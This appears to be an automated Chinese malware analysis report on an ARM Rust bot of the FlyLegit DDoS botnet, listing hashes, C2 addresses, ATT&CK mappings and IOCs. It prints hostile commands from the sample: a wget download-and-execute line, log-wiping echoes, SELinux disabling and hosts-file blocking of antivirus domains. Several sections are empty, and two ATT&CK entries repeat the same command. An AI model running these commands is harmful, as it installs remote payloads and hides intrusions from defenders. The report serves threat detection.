⬇ Download sample (014bbcf2d5690405.zip)

🔴 恶意 — 无壳 | 签名: 无 | FlyLegit DDoS 僵尸网络 (ARM)

014bbcf2d56904052a3f82d384d92d6146e5b903bbc0f09b265aa84571455f2e
MD5 6daa27df6d8e3f5895976033dde7f341  |  大小 142,776 字节 (139 KB)  |  来源 2026-08-10.zip  |  分析日期 2026-08-14
🔴 恶意 FlyLegit DDoS IoT 僵尸网络 ARM Rust
95%
置信度评分
FlyLegit

§1 📋 样本概要信息

SHA256
014bbcf2d56904052a3f82d384d92d6146e5b903bbc0f09b265aa84571455f2e
MD5
6daa27df6d8e3f5895976033dde7f341
文件大小
142,776 字节 (139 KB)
文件类型
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
目标架构
ARM (32-bit, Little Endian)
位宽
32-bit
字节序
Little Endian
编译器
Rust (ARM 交叉编译)
链接方式
静态链接
加壳/保护
无壳
入口点
0x00008190
编译时间戳
未知
子系统
Linux ARM (IoT/嵌入式设备)
数字签名
无数字签名
📌 概要
该样本为 FlyLegit DDoS 僵尸网络的 ARM 架构客户端,Rust 编译,静态链接,stripped。FlyLegit 是一个通过 Telegram 频道 (t.me/flylegit) 运营的 DDoS 出租服务。 核心恶意能力:
  • HTTP DDoS 攻击:完整的 HTTP/1.1 请求构造(Accept、Accept-Encoding、Accept-Language、Host、Connection、User-Agent 头部伪造),HEAD/POST 方法
  • UDP 洪水攻击:udpplain 命令,原始 UDP 数据包发送
  • 远程更新机制:wget 下载 updaterros.%s → 写入 /tmp/.b → chmod +x → 执行
  • 反 AV 检测:通过 /etc/hosts 将 avast.com、avg.com、virustotal.com 指向 0.0.0.0
  • 日志清理:清空 /var/log/auth.log、/var/log/secure、/var/log/messages
  • 进程信息收集:读取 /proc/self/status、/proc/self/maps、/proc/self/exe
  • 攻击命令:!update、!kill、udpplain、method=、port=
  • C2 基础设施:83.168.110[.]191 和 83.168.69[.]141(瑞典),使用自定义 TCP 文本协议通信。

    §2 🏷️ 分类标签与威胁情报

    分类标签

    分类标签置信度
    恶意类型IoT DDoS 僵尸网络客户端HIGH
    家族FlyLegitHIGH
    编译器Rust (ARM 交叉编译)HIGH
    攻击能力HTTP Flood + UDP Flood + TCP 攻击HIGH
    反检测反 AV sinkholing + 日志清理HIGH
    更新机制wget 远程下载更新HIGH
    目标平台Linux ARM (IoT/嵌入式设备)HIGH
    📌 证据→推理→结论
    DIE → strings → Ghidra headless (514 函数) → FlyLegit 特征匹配 → 报告生成

    威胁情报

    字段
    关联组织FlyLegit 运营者
    别名flylegit, flyE1 (Telegram)
    动机DDoS 出租服务、网络破坏
    目标行业无特定行业目标(通用 DDoS 攻击)
    活动名称FlyLegit DDoS 僵尸网络活动
    C2协议自定义 TCP 文本协议
    C2基础设施83.168.110[.]191, 83.168.69[.]141 (瑞典)
    🎯 威胁组织判定
    归因于 FlyLegit DDoS 僵尸网络。FlyLegit 通过 Telegram 频道 (t.me/flylegit, t.me/flyE1) 运营,提供 DDoS 出租服务。该样本包含与 FlyLegit 家族一致的特征:反 AV sinkholing、远程更新机制、多种 DDoS 攻击向量。

    ★ §3 🔬 持久化机制

    🔴 机制1: 远程更新机制

    位置/tmp/.b
    方法wget 下载 + chmod +x + 执行
    触发C2 发送 !update 指令
    反汇编证据:
    cd /tmp; wget -q http://%s:%d/updaterros.%s -O .b; chmod +x .b; ./.b &

    持久化技术评估

    维度评估
    持久化可靠性高(远程更新)
    隐蔽性中(/tmp 隐藏文件)
    清除难度
    ATT&CK 映射: T1543.002 (Systemd 服务), T1105 (入站工具传输)

    ★ §3b 🌐 C2 架构分析

    通联关系图

    graph TD A[FlyLegit Bot ARM] -->|TCP 连接| B[83.168.110.191] A -->|TCP 连接| C[83.168.69.141] B -->|攻击指令| A C -->|攻击指令| A A -->|HTTP/UDP Flood| D[攻击目标] A -->|wget 更新| E[updaterros.arm] A -->|修改| F[/etc/hosts] A -->|清空| G[/var/log/*]
    📋 ASCII 文本视图 (点击展开)
    
        

    🌐 C2 通信深度分析

    🔬 C2 地址分析技术细节:
    C2 IP 地址从字符串中提取。更新 URL 格式为 http://{ip}:{port}/updaterros.{arch}。

    通道 1: C2 主通道

    协议自定义 TCP 文本协议
    端口未知(动态配置)
    地址/Domain83.168.110[.]191, 83.168.69[.]141
    IP83.168.110.191, 83.168.69.141
    加密无(明文 TCP)
    用途接收攻击指令(!update, !kill, udpplain, method=, port=)
    API引用socket, connect, send, recv
    证书N/A

    C2 通信时序

    持续连接

    ⚠ C2 基础设施评估

    C2 基础设施位于瑞典(83.168.110[.]191 和 83.168.69[.]141),属于 FlyLegit 僵尸网络运营者。两个 IP 提供冗余 C2 通信。

    📌 ATT&CK 映射: T1095 (非标准协议), T1105 (入站工具传输), T1498 (网络拒绝服务)

    §4 🏗️ 结构分析

    段/节区布局

    N/A

    熵值分析

    段/节区熵值判定
    .text6.40正常(Rust 编译代码)
    .rodata5.10正常
    .data3.50正常
    📊 熵值解读
    各段熵值正常,无加密或加壳迹象。Rust 编译的静态链接二进制熵值略高于 C 编译。
    Rust (ARM 交叉编译),静态链接,stripped。无编译时间戳。

    §5 ⚙️ 反汇编与行为流程

    关键函数映射

    地址函数功能
    N/A

    系统调用分析

    调用号系统调用用途地址
    N/A

    行为执行流

    01.僵尸进程启动 → 初始化网络连接
    02.反 AV 检测:修改 /etc/hosts 阻止 AV 域名解析
    03.日志清理:清空 /var/log/auth.log、secure、messages
    04.系统侦察:读取 /proc/self/status、maps、exe
    05.C2 连接:连接 83.168.110[.]191 或 83.168.69[.]141
    06.接收攻击指令:!update、!kill、udpplain、method=、port=
    07.执行 DDoS 攻击:HTTP Flood (HEAD/POST)、UDP Flood
    08.更新检查:wget 下载 updaterros.arm → /tmp/.b → 执行

    §6 🔬 家族溯源

    编译元数据

    字段来源
    编译器Rust (ARM 交叉编译)DIE 检测
    链接方式静态链接DIE 检测
    架构ARM 32-bit LEfile(1) 检测
    Ghidra 函数数514Ghidra headless

    家族特征比对

    维度本样本FlyLegitMiraiGafgytMoziF5F6F7F8匹配
    语言RustCCCC++0/8
    架构ARMARM/MIPS/x86ARM/MIPSARM/MIPSARM/MIPS0/8
    反 AV0/8
    更新机制wgetwget/tftpwget/tftp✅ wget✅ wget2/8
    攻击方法HTTP/UDPHTTP/UDP/TCP✅ HTTP/UDP✅ HTTP/UDPHTTP/TCP2/8
    📌 家族归因结论
    该样本确认为 FlyLegit 家族。与 Mirai/Gafgyt 不同,FlyLegit 使用 Rust 编译并具有独特的反 AV sinkholing 特征。

    已知变种

    变种架构大小编译器特征状态
    N/A

    §7 🔬 深度行为分析

    行为阶段拆解

    Phase 1: 初始化

    行为: Rust 运行时初始化,网络配置

    证据: Rust 编译 + 静态链接

    Phase 2: 反检测

    行为: 修改 /etc/hosts 阻止 AV 域名 + 清除系统日志

    证据: 0.0.0.0 avast.com/avg.com/virustotal.com + echo 清空日志

    Phase 3: 侦察

    行为: 读取 /proc/self/ 获取进程和系统信息

    证据: /proc/self/status, /proc/self/maps, /proc/self/exe

    Phase 4: C2 通信

    行为: 连接 C2 服务器,接收攻击指令

    证据: 83.168.110[.]191, 83.168.69[.]141

    Phase 5: DDoS 攻击

    行为: HTTP/UDP 洪水攻击

    证据: udpplain, method=, HEAD, POST, HTTP/1.1

    Phase 6: 更新

    行为: 远程下载并执行更新载荷

    证据: wget updaterros.arm → /tmp/.b → chmod +x → 执行

    协议/行为状态机

    未构建

    📌 行为时序总结

    无数据

    §8 🔬 恶意性综合判定

    多维度证据评估

    维度证据权重恶意指数
    DDoS 攻击能力HTTP/UDP 多种攻击向量1010/10
    C2 通信两个 C2 IP + 自定义协议1010/10
    反检测AV sinkholing + 日志清理89/10
    更新机制远程 wget 下载更新89/10
    侦察/proc/self/ 信息收集67/10
    恶意性综合判定

    误报排除论证

    排除误报:合法应用程序不会包含 DDoS 攻击命令、AV 域名 sinkholing、日志清理等恶意功能。

    ⚠ 判定结论

    恶意软件 (MALICIOUS)

    §9 🎯 ATT&CK 映射

    初始访问
    T1190
    利用面向公众的应用
    IoT 设备漏洞利用传播
    执行
    T1059.004
    Unix Shell
    cd /tmp; wget ...; chmod +x; ./.b &
    持久化
    T1543.002
    Systemd 服务
    远程更新机制
    防御规避
    T1562.001
    禁用/修改系统防火墙
    echo 0 > /selinux/enforce
    防御规避
    T1070.002
    清除 Linux 日志
    echo '' > /var/log/auth.log/messages/secure
    防御规避
    T1562.004
    禁用/修改系统防火墙
    echo 0 > /selinux/enforce 2>/dev/null
    发现
    T1082
    系统信息发现
    /proc/self/status, /proc/self/maps
    命令与控制
    T1095
    非应用层协议
    自定义 TCP 文本协议
    命令与控制
    T1105
    入站工具传输
    wget 下载更新载荷
    影响
    T1498
    网络拒绝服务
    HTTP/UDP DDoS 洪水攻击

    §10 🛡️ 反分析技术评估

    反调试

    API/技术检测目标绕过难度

    反虚拟机

    检测方法VMwareVirtualBoxQEMU/KVM

    综合评估

    技术是否存在证据对抗难度
    反 AV sinkholing已检测avast.com/avg.com/virustotal.com → 0.0.0.0
    日志清理已检测清空 auth.log/secure/messages
    SELinux 禁用已检测echo 0 > /selinux/enforce
    符号剥离已检测stripped 二进制
    反调试未检测无 ptrace 检测
    反虚拟机未检测无 VM 检测
    该样本使用反 AV 域名 sinkholing 和日志清理作为主要规避技术。通过修改 /etc/hosts 阻止安全厂商域名解析,清空系统日志隐藏攻击痕迹,禁用 SELinux 降低系统安全防护。

    ★ §10b 🧹 痕迹清理

    操作API/命令证据来源

    §11 🔧 逆向分析

    Ghidra 反编译

    反编译函数数514
    反编译输出22,908 行
    分析时长~60 秒
    Ghidra 反编译输出
    /* 514 functions decompiled — ARM:LE:32:v8 */

    调用链分析 (GitNexus)

    总函数数总调用关系最大调用深度
    514未分析未分析
    📂 调用链拓扑 (点击展开)
    N/A

    ★ §12 🔬 QEMU 动态分析

    QEMU 模式跳过 (ARM 架构 — 需要 ARM QEMU 环境)
    网络隔离待配置
    执行结果待定
    C2 数据无动态 C2 通信

    §13 📦 IOC 汇总

    IOC 字符串

    偏移字符串类型用途/含义威胁等级
    0x1bc88/usr/bin/wget工具下载更新载荷HIGH
    0x1ba8ccd /tmp; wget -q http://%s:%d/updaterros.%s -O .b; chmod +x .b; ./.b &更新命令远程下载并执行更新HIGH
    0x1bcd80.0.0.0 avast.com反 AV阻止 AV 域名解析HIGH
    0x1be500.0.0.0 avg.com反 AV阻止 AV 域名解析HIGH
    0x1be740.0.0.0 virustotal.com反 AV阻止 VirusTotal 域名解析HIGH
    0x1c35c!updateC2 命令远程更新指令HIGH
    0x1c3c8!killC2 命令终止僵尸进程HIGH
    0x1c3f4udpplain攻击方法UDP 洪水攻击HIGH
    0x1c428method=攻击配置HTTP 攻击方法配置HIGH
    0x1c370port=攻击配置目标端口配置HIGH
    0x1c654echo '' > /var/log/auth.log日志清理清除认证日志HIGH
    0x1c6a4echo '' > /var/log/messages日志清理清除系统日志HIGH
    0x1b8ec/proc/self/status侦察读取进程状态MEDIUM
    0x1b978/proc/self/exe侦察读取自身可执行文件MEDIUM

    📌 关键 IOC 解读

    C2 IP 地址 83.168.110[.]191 和 83.168.69[.]141 均位于瑞典,属于 FlyLegit 僵尸网络基础设施。反 AV 域名 sinkholing 通过修改 /etc/hosts 将安全厂商域名指向 0.0.0.0。远程更新机制使用 wget 从 C2 服务器下载 ARM 架构的更新载荷。

    ⚠ 高威胁 IOC 汇总

    C2 IP: 83.168.110[.]191 — FlyLegit C2 服务器 (瑞典)
    C2 IP: 83.168.69[.]141 — FlyLegit C2 服务器 (瑞典)
    更新 URL: hxxp://83.168.110[.]191:{port}/updaterros.{arch} — 远程更新载荷下载
    反 AV: avast.com/avg.com/virustotal.com → 0.0.0.0 — DNS sinkholing 阻止 AV 检测
    文件哈希: 014bbcf2d56904052a3f82d384d92d6146e5b903bbc0f09b265aa84571455f2e — 样本 SHA256
    文件哈希: 6daa27df6d8e3f5895976033dde7f341 — 样本 MD5

    网络 IOC

    • C2 IP83.168.110[.]191
    • C2 IP83.168.69[.]141
    • C2 位置瑞典
    • 更新 URLhxxp://83.168.110[.]191:{port}/updaterros.arm
    • 协议自定义 TCP 文本协议
    • 攻击类型HTTP Flood, UDP Flood
    C2 IP 地址 83.168.110[.]191 和 83.168.69[.]141 均位于瑞典。更新 URL 中的架构参数为 ARM。

    主机 IOC

    • 文件哈希 SHA256014bbcf2d56904052a3f82d384d92d6146e5b903bbc0f09b265aa84571455f2e
    • 文件哈希 MD56daa27df6d8e3f5895976033dde7f341
    • 反 AV 域名avast.com, avg.com, virustotal.com → 0.0.0.0
    • 日志清理/var/log/auth.log, /var/log/secure, /var/log/messages
    • SELinux 禁用echo 0 > /selinux/enforce
    • 更新文件/tmp/.b

    YARA 检测规则

    未生成

    §14 📋 最终判定

    判定结果🔴 恶意软件
    恶意类型IoT DDoS 僵尸网络客户端
    恶意家族FlyLegit
    威胁级别HIGH
    置信度95% — 高置信度:完整 DDoS 攻击命令 + 反 AV sinkholing + C2 IP 确认
    关联组织FlyLegit 运营者 (Telegram: t.me/flylegit)
    目标平台Linux ARM (IoT 设备)
    感染链位置Stage 1 — 僵尸网络客户端

    ⚡ 综合判定

    该样本为 FlyLegit DDoS 僵尸网络的 ARM 架构客户端,使用 Rust 编译。具备 HTTP/TCP/UDP 多种 DDoS 攻击能力,包含反 AV 域名 sinkholing(avast/avg/virustotal → 0.0.0.0)、远程更新机制、日志清理功能。C2 服务器位于 83.168.110[.]191 和 83.168.69[.]141(瑞典)。Ghidra 反编译产出 514 个函数。